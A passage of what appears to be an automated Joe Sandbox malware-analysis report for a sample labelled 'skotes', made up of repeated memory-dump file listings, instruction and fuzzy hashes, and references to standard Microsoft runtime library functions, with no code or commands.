                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1256429809-0
                                                                                                                                                                                            • Opcode ID: 71b319b7fbfa940c3a57a6f4471aa97a4bdb98ec67e405c86eeacfca920daf3f
                                                                                                                                                                                            • Instruction ID: 17a4e64e0d8e489d94e918cc19c0c1a15489c782b5e7be0421f4073e9b9ce0a4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 71b319b7fbfa940c3a57a6f4471aa97a4bdb98ec67e405c86eeacfca920daf3f
                                                                                                                                                                                            • Instruction Fuzzy Hash: D4716B7090025AABDF15DF54C9A1BFEBBB7AF55308F044098EC426B392C7319D16DBA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00622876
                                                                                                                                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006228DF
                                                                                                                                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00622913
                                                                                                                                                                                              • Part of subcall function 006207ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0062080D
                                                                                                                                                                                            • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00622993
                                                                                                                                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006229DB
                                                                                                                                                                                              • Part of subcall function 006207C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006207DE
                                                                                                                                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006229EF
                                                                                                                                                                                            • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00622A00
                                                                                                                                                                                            • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00622A4D
                                                                                                                                                                                            • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00622A7E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1321587334-0
                                                                                                                                                                                            • Opcode ID: 26b02577512f576ba6b73616a75d0bec859f7ca797d1b0e2620a74e2d234a53d
                                                                                                                                                                                            • Instruction ID: 1d658e37679af6c5c2fb3ccc32946773274414a6512cc896f5a80a4808e97f4a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 26b02577512f576ba6b73616a75d0bec859f7ca797d1b0e2620a74e2d234a53d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C81BE31A00A27ABCB18DF69E8B15BDB7B3BB48300F24402DD446A7741DB74AD85CF94
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00626A1F
                                                                                                                                                                                            • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00626A51
                                                                                                                                                                                            • List.LIBCONCRT ref: 00626A8C
                                                                                                                                                                                            • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00626A9D
                                                                                                                                                                                            • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00626AB9
                                                                                                                                                                                            • List.LIBCONCRT ref: 00626AF4
                                                                                                                                                                                            • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00626B05
                                                                                                                                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00626B20
                                                                                                                                                                                            • List.LIBCONCRT ref: 00626B5B
                                                                                                                                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00626B68
                                                                                                                                                                                              • Part of subcall function 00625EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00625EF7
                                                                                                                                                                                              • Part of subcall function 00625EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00625F09
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3403738998-0
                                                                                                                                                                                            • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                            • Instruction ID: 1faf37a785b9a97aaec46d52a78f606b37c68dc3443d47e2d53611cb8d2c8329
                                                                                                                                                                                            • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B515E71A00629ABDB18DF64D495BEDB3A9BF08304F0540ADE955AB382DB70AE44CF90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 006353A0
                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 006353C7
                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 006354D3
                                                                                                                                                                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 006355AE
                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 00635650
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 4162181273-393685449
                                                                                                                                                                                            • Opcode ID: 0d15a9cb534af740dececf69fbc234aae5b8d9393c977708eed4efd7d9acae47
                                                                                                                                                                                            • Instruction ID: b0c3a20bded652fa6dce9d320a5d9cb305a49219a392488d6e0bec4098592cd6
